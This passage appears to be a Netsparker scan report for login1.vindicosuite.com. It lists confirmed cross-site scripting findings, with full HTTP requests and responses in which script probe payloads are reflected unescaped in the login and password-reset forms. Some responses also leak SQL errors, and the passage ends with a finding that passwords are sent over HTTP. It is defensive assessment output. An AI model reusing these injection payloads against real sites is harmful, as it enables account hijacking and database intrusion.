Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Content-Length: 105
Accept-Encoding: gzip, deflate
password=3&username='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0000A5)%3c%2fscript%3e
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Content-Length: 105
Accept-Encoding: gzip, deflate
password=3&username='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0000A5)%3c%2fscript%3e
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 242
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:44:28 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Unclosed quotation mark after the character string '--></style></script><script>netsparker(0x0000A5)</script>', @password = '3''.</div>
Cache-Control: private
Content-Length: 242
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:44:28 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Unclosed quotation mark after the character string '--></style></script><script>netsparker(0x0000A5)</script>', @password = '3''.</div>
|
- /default.asp
/default.asp CONFIRMED |
Parameters
| Parameter | Type | Value |
| message | GET | '"--></style></script><script>alert(0x0000C7)</script> |
Request
GET /default.asp?message='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000C7)%3C/script%3E HTTP/1.1
Referer: http://login1.vindicosuite.com/vindico_dynamic.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Accept-Encoding: gzip, deflate
Referer: http://login1.vindicosuite.com/vindico_dynamic.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2321
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:46:25 GMT
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<link rel="stylesheet" type="text/css" href="App_Themes/Default/vindico.css">
<script type="text/javascript">
function Login()
{
MainForm.submit()
}
function ResetPassword()
{
var url = "/AccountManager/ResetPassword/index.asp";
var name = "WINDOW_RESETPASS";
var features = "width=500,height=370";
window.open(url,name, features)
}
</script>
</head>
<body>
<table class="SiteTable" id="table2">
<tr>
<td align="center" width="50%" style="border-left-width: 1px; border-right-style: solid; border-right-width: 1px; border-top-width: 1px; border-bottom-width: 1px">
<img border="0" src="App_Themes/Default/defaul2.gif"></td>
<td align="center" width="50%"><div class = "loggedInAs">
<form method="POST" action="vindico_dynamic.asp" name = "MainForm">
<table cellpadding="0" width="317" style="border-collapse: collapse" border="1" bordercolor="#C0C0C0" id="table3" height="152">
<tr>
<td height="152" bgcolor="#E7E7D6">
<div align="center">
<table cellpadding="0" style="border-collapse: collapse" id="table4" width="247" height="85">
<tr>
<td width="247" height="33" colspan="2">'"--></style></script><script>netsparker(0x0000C7)</script></td>
</tr>
<tr>
<td width="64" height="33"><b>Username:</b></td>
<td width="183" height="33"><input type="text" name="username" size="15"></td>
</tr>
<tr>
<td width="64" height="25"><b>Password:</b></td>
<td width="183" height="25"><input type="password" name="password" size="8"></td>
</tr>
<tr>
<td colspan="2" align="left" height="21">
<br />
<input name="loginBtn" class="button" type="submit" value = "Login" onclick = "Login();"/>
<input name="resetPasswordBtn" class="button" type="button" value = "Reset Password" onclick = "ResetPassword()"/>
</td>
</tr>
</table>
</div>
</td>
</tr>
</table>
</form>
</div></td>
</tr>
</table>
</body>
</html>
Cache-Control: private
Content-Length: 2321
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:46:25 GMT
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<link rel="stylesheet" type="text/css" href="App_Themes/Default/vindico.css">
<script type="text/javascript">
function Login()
{
MainForm.submit()
}
function ResetPassword()
{
var url = "/AccountManager/ResetPassword/index.asp";
var name = "WINDOW_RESETPASS";
var features = "width=500,height=370";
window.open(url,name, features)
}
</script>
</head>
<body>
<table class="SiteTable" id="table2">
<tr>
<td align="center" width="50%" style="border-left-width: 1px; border-right-style: solid; border-right-width: 1px; border-top-width: 1px; border-bottom-width: 1px">
<img border="0" src="App_Themes/Default/defaul2.gif"></td>
<td align="center" width="50%"><div class = "loggedInAs">
<form method="POST" action="vindico_dynamic.asp" name = "MainForm">
<table cellpadding="0" width="317" style="border-collapse: collapse" border="1" bordercolor="#C0C0C0" id="table3" height="152">
<tr>
<td height="152" bgcolor="#E7E7D6">
<div align="center">
<table cellpadding="0" style="border-collapse: collapse" id="table4" width="247" height="85">
<tr>
<td width="247" height="33" colspan="2">'"--></style></script><script>netsparker(0x0000C7)</script></td>
</tr>
<tr>
<td width="64" height="33"><b>Username:</b></td>
<td width="183" height="33"><input type="text" name="username" size="15"></td>
</tr>
<tr>
<td width="64" height="25"><b>Password:</b></td>
<td width="183" height="25"><input type="password" name="password" size="8"></td>
</tr>
<tr>
<td colspan="2" align="left" height="21">
<br />
<input name="loginBtn" class="button" type="submit" value = "Login" onclick = "Login();"/>
<input name="resetPasswordBtn" class="button" type="button" value = "Reset Password" onclick = "ResetPassword()"/>
</td>
</tr>
</table>
</div>
</td>
</tr>
</table>
</form>
</div></td>
</tr>
</table>
</body>
</html>
|
- /AccountManager/ResetPassword/Exec_Reset.asp
/AccountManager/ResetPassword/Exec_Reset.asp CONFIRMED |
Parameters
| Parameter | Type | Value |
| username | POST | '"--></style></script><script>alert(0x0000C8)</script> |
| existingPassword | POST | 3 |
| newPassword | POST | 3 |
Request
POST /AccountManager/ResetPassword/Exec_Reset.asp HTTP/1.1
Referer: http://login1.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Content-Length: 127
Accept-Encoding: gzip, deflate
username='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0000C8)%3c%2fscript%3e&existingPassword=3&newPassword=3
Referer: http://login1.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Content-Length: 127
Accept-Encoding: gzip, deflate
username='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0000C8)%3c%2fscript%3e&existingPassword=3&newPassword=3
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 262
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:46:25 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Unclosed quotation mark after the character string '--></style></script><script>netsparker(0x0000C8)</script>', @existingPass = '3', @newPass = '3''.</div>
Cache-Control: private
Content-Length: 262
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:46:25 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Unclosed quotation mark after the character string '--></style></script><script>netsparker(0x0000C8)</script>', @existingPass = '3', @newPass = '3''.</div>
|
- /AccountManager/ResetPassword/Exec_Reset.asp
/AccountManager/ResetPassword/Exec_Reset.asp CONFIRMED |
Parameters
| Parameter | Type | Value |
| username | POST | Smith |
| existingPassword | POST | '"--></style></script><script>alert(0x0000D3)</script> |
| newPassword | POST | 3 |
Request
POST /AccountManager/ResetPassword/Exec_Reset.asp HTTP/1.1
Referer: http://login1.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Content-Length: 131
Accept-Encoding: gzip, deflate
username=Smith&existingPassword='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0000D3)%3c%2fscript%3e&newPassword=3
Referer: http://login1.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Content-Length: 131
Accept-Encoding: gzip, deflate
username=Smith&existingPassword='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0000D3)%3c%2fscript%3e&newPassword=3
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 241
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:46:51 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Unclosed quotation mark after the character string '--></style></script><script>netsparker(0x0000D3)</script>', @newPass = '3''.</div>
Cache-Control: private
Content-Length: 241
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:46:51 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Unclosed quotation mark after the character string '--></style></script><script>netsparker(0x0000D3)</script>', @newPass = '3''.</div>
|
- /AccountManager/ResetPassword/Exec_Reset.asp
/AccountManager/ResetPassword/Exec_Reset.asp CONFIRMED |
Parameters
| Parameter | Type | Value |
| username | POST | Smith |
| existingPassword | POST | 3 |
| newPassword | POST | '"--></style></script><script>alert(0x0000DE)</script> |
Request
POST /AccountManager/ResetPassword/Exec_Reset.asp HTTP/1.1
Referer: http://login1.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Content-Length: 131
Accept-Encoding: gzip, deflate
username=Smith&existingPassword=3&newPassword='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0000DE)%3c%2fscript%3e
Referer: http://login1.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Content-Length: 131
Accept-Encoding: gzip, deflate
username=Smith&existingPassword=3&newPassword='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0000DE)%3c%2fscript%3e
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 225
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:47:23 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Unclosed quotation mark after the character string '--></style></script><script>netsparker(0x0000DE)</script>''.</div>
Cache-Control: private
Content-Length: 225
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:47:23 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Unclosed quotation mark after the character string '--></style></script><script>netsparker(0x0000DE)</script>''.</div>
|
- /vindico_dynamic.asp
/vindico_dynamic.asp CONFIRMED |
Parameters
| Parameter | Type | Value |
| username | POST | '"--></style></script><script>alert(0x0000E9)</script> |
| password | POST | 3 |
| loginBtn | POST | Login |
| resetPasswordBtn | POST | Reset Password |
Request
POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Content-Length: 152
Accept-Encoding: gzip, deflate
username='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0000E9)%3c%2fscript%3e&password=3&loginBtn=Login&resetPasswordBtn=Reset+Password
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Content-Length: 152
Accept-Encoding: gzip, deflate
username='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0000E9)%3c%2fscript%3e&password=3&loginBtn=Login&resetPasswordBtn=Reset+Password
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 242
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:47:55 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Unclosed quotation mark after the character string '--></style></script><script>netsparker(0x0000E9)</script>', @password = '3''.</div>
Cache-Control: private
Content-Length: 242
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:47:55 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Unclosed quotation mark after the character string '--></style></script><script>netsparker(0x0000E9)</script>', @password = '3''.</div>
|
- /vindico_dynamic.asp
/vindico_dynamic.asp CONFIRMED |
Parameters
| Parameter | Type | Value |
| username | POST | Smith |
| password | POST | '"--></style></script><script>alert(0x0000F6)</script> |
| loginBtn | POST | Login |
| resetPasswordBtn | POST | Reset Password |
Request
POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=HALJIJIDLGJHPFKPIKJOLNMF
Content-Length: 156
Accept-Encoding: gzip, deflate
username=Smith&password='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0000F6)%3c%2fscript%3e&loginBtn=Login&resetPasswordBtn=Reset+Password
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=HALJIJIDLGJHPFKPIKJOLNMF
Content-Length: 156
Accept-Encoding: gzip, deflate
username=Smith&password='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0000F6)%3c%2fscript%3e&loginBtn=Login&resetPasswordBtn=Reset+Password
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 225
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:47:57 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Unclosed quotation mark after the character string '--></style></script><script>netsparker(0x0000F6)</script>''.</div>
Cache-Control: private
Content-Length: 225
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:47:57 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Unclosed quotation mark after the character string '--></style></script><script>netsparker(0x0000F6)</script>''.</div>
|
- /vindico_dynamic.asp
/vindico_dynamic.asp CONFIRMED |
Parameters
| Parameter | Type | Value |
| username | POST | '"--></style></script><script>alert(0x000118)</script> |
| password | POST | 3 |
| loginBtn | POST | Login |
Request
POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=HALJIJIDLGJHPFKPIKJOLNMF
Content-Length: 120
Accept-Encoding: gzip, deflate
username='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000118)%3c%2fscript%3e&password=3&loginBtn=Login
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=HALJIJIDLGJHPFKPIKJOLNMF
Content-Length: 120
Accept-Encoding: gzip, deflate
username='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000118)%3c%2fscript%3e&password=3&loginBtn=Login
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 242
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:49:23 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Unclosed quotation mark after the character string '--></style></script><script>netsparker(0x000118)</script>', @password = '3''.</div>
Cache-Control: private
Content-Length: 242
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:49:23 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Unclosed quotation mark after the character string '--></style></script><script>netsparker(0x000118)</script>', @password = '3''.</div>
|
- /vindico_dynamic.asp
/vindico_dynamic.asp CONFIRMED |
Parameters
| Parameter | Type | Value |
| username | POST | Smith |
| password | POST | '"--></style></script><script>alert(0x000123)</script> |
| loginBtn | POST | Login |
Request
POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=HALJIJIDLGJHPFKPIKJOLNMF
Content-Length: 124
Accept-Encoding: gzip, deflate
username=Smith&password='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000123)%3c%2fscript%3e&loginBtn=Login
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=HALJIJIDLGJHPFKPIKJOLNMF
Content-Length: 124
Accept-Encoding: gzip, deflate
username=Smith&password='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000123)%3c%2fscript%3e&loginBtn=Login
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 225
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:49:29 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Unclosed quotation mark after the character string '--></style></script><script>netsparker(0x000123)</script>''.</div>
Cache-Control: private
Content-Length: 225
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:49:29 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Unclosed quotation mark after the character string '--></style></script><script>netsparker(0x000123)</script>''.</div>
|
- /AccountManager/ResetPassword/index.asp
/AccountManager/ResetPassword/index.asp CONFIRMED |
Parameters
| Parameter | Type | Value |
| message | GET | '"--></style></script><script>alert(0x000129)</script> |
| username | POST | Smith |
| existingPassword | POST | 3 |
| newPassword | POST | 3 |
Request
POST /AccountManager/ResetPassword/index.asp?message='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000129)%3C/script%3E HTTP/1.1
Referer: http://login1.vindicosuite.com/AccountManager/ResetPassword/index.asp?message=Please%20check%20your%20username
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=IALJIJIDHKIKAEEENOPNFNEK
Content-Length: 47
Accept-Encoding: gzip, deflate
username=Smith&existingPassword=3&newPassword=3
Referer: http://login1.vindicosuite.com/AccountManager/ResetPassword/index.asp?message=Please%20check%20your%20username
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=IALJIJIDHKIKAEEENOPNFNEK
Content-Length: 47
Accept-Encoding: gzip, deflate
username=Smith&existingPassword=3&newPassword=3
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3692
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:49:32 GMT
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
edited by Tim Whidden Today is 1/13/11. It is now 9:23 AM
-->
<head>
<title>Password Reset</title>
<script type="text/javascript">
function Handle_EmailPass () {
var MainForm = document.getElementById("frm");
var username = document.getElementById("username").value;
if (username == "") {
alert("A username/email address is required to reset the password.");
return;
} else {
MainForm.action = "Exec_ResetAndEmail.asp";
MainForm.submit();
}
}
function Handle_ResetPass () {
var MainForm = document.getElementById("frm");
MainForm.action = "Exec_Reset.asp";
MainForm.submit();
}
</script>
<link rel="stylesheet" type="text/css" href="../../App_Themes/Default/vindico2.css">
<style type="text/css">
body {
margin: 10px;
}
.divMessage {
margin-bottom: 8px;
font-weight: bold;
background-color: #d4e5ae;
border: 1px solid green;
color: black;
padding: 6px;
}
</style>
</head>
<body>
<div style="float: right;"><a style="color:blue;" href="#close" onclick="window.close();">close window</a></div>
<h3>VINDICO Password Reset</h3>
<div class='divMessage'>'"--></style></script><script>netsparker(0x000129)</script></div>
<form name = "frm" id="frm" action = "" method = "Post" autocomplete="off">
<table cellpadding="5" cellspacing="0" border = "0" style="width: 100%;">
<tr>
<td nowrap><strong>username (email):</strong></td>
<td width="100%">
<input id="username" type ="text" value= "" name="username">
</td>
</tr>
<tr>
<td nowrap><strong>current password:</strong></td>
<td width="100%">
<input type ="password" name="existingPassword" value= "">
</td>
</tr>
<tr>
<td nowrap><strong>new password:</strong></td>
<td width="100%">
<input type ="password" name="newPassword" value="">
</td>
</tr>
<tr>
<td></td>
<td>
<input type="button" value="reset password" onclick = "Handle_ResetPass();">
</td>
</tr>
<tr>
<td colspan=2>
<hr noshade size="1">
</td>
</tr>
<tr>
<td colspan="2">
If you <strong>can't remember your password, enter your username</strong>
(should be your email address)
in the username field above. Then, <strong>click 'Reset and Email'</strong>
and an email will be sent containing your new password.
<br><br>
<input type="button" value="reset and email" onclick = "Handle_EmailPass();">
</td>
</tr>
<tr>
<td colspan=2>
</td>
</tr>
<tr>
<td>
</td>
</tr>
</table>
<hr noshade size="1">
</form>
</body>
</html>
Cache-Control: private
Content-Length: 3692
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:49:32 GMT
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
edited by Tim Whidden Today is 1/13/11. It is now 9:23 AM
-->
<head>
<title>Password Reset</title>
<script type="text/javascript">
function Handle_EmailPass () {
var MainForm = document.getElementById("frm");
var username = document.getElementById("username").value;
if (username == "") {
alert("A username/email address is required to reset the password.");
return;
} else {
MainForm.action = "Exec_ResetAndEmail.asp";
MainForm.submit();
}
}
function Handle_ResetPass () {
var MainForm = document.getElementById("frm");
MainForm.action = "Exec_Reset.asp";
MainForm.submit();
}
</script>
<link rel="stylesheet" type="text/css" href="../../App_Themes/Default/vindico2.css">
<style type="text/css">
body {
margin: 10px;
}
.divMessage {
margin-bottom: 8px;
font-weight: bold;
background-color: #d4e5ae;
border: 1px solid green;
color: black;
padding: 6px;
}
</style>
</head>
<body>
<div style="float: right;"><a style="color:blue;" href="#close" onclick="window.close();">close window</a></div>
<h3>VINDICO Password Reset</h3>
<div class='divMessage'>'"--></style></script><script>netsparker(0x000129)</script></div>
<form name = "frm" id="frm" action = "" method = "Post" autocomplete="off">
<table cellpadding="5" cellspacing="0" border = "0" style="width: 100%;">
<tr>
<td nowrap><strong>username (email):</strong></td>
<td width="100%">
<input id="username" type ="text" value= "" name="username">
</td>
</tr>
<tr>
<td nowrap><strong>current password:</strong></td>
<td width="100%">
<input type ="password" name="existingPassword" value= "">
</td>
</tr>
<tr>
<td nowrap><strong>new password:</strong></td>
<td width="100%">
<input type ="password" name="newPassword" value="">
</td>
</tr>
<tr>
<td></td>
<td>
<input type="button" value="reset password" onclick = "Handle_ResetPass();">
</td>
</tr>
<tr>
<td colspan=2>
<hr noshade size="1">
</td>
</tr>
<tr>
<td colspan="2">
If you <strong>can't remember your password, enter your username</strong>
(should be your email address)
in the username field above. Then, <strong>click 'Reset and Email'</strong>
and an email will be sent containing your new password.
<br><br>
<input type="button" value="reset and email" onclick = "Handle_EmailPass();">
</td>
</tr>
<tr>
<td colspan=2>
</td>
</tr>
<tr>
<td>
</td>
</tr>
</table>
<hr noshade size="1">
</form>
</body>
</html>
Password Transmitted Over HTTP
Password Transmitted Over HTTP
1
TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.
Impact
If an attacker can intercept network traffic he/she can steal users credentials.
Actions to Take
- See the remedy for solution.
- Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.
Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
|
- /AccountManager/ResetPassword/index.asp
/AccountManager/ResetPassword/index.asp CONFIRMED |
Form target action
Exec_Reset.asp
Request
GET /AccountManager/ResetPassword/index.asp HTTP/1.1
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Accept-Encoding: gzip, deflate
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3603
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:19 GMT
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
edited by Tim Whidden Today is 1/13/11. It is now 9:23 AM
-->
<head>
<title>Password Reset</title>
<script type="text/javascript">
function Handle_EmailPass () {
var MainForm = document.getElementById("frm");
var username = document.getElementById("username").value;
if (username == "") {
alert("A username/email address is required to reset the password.");
return;
} else {
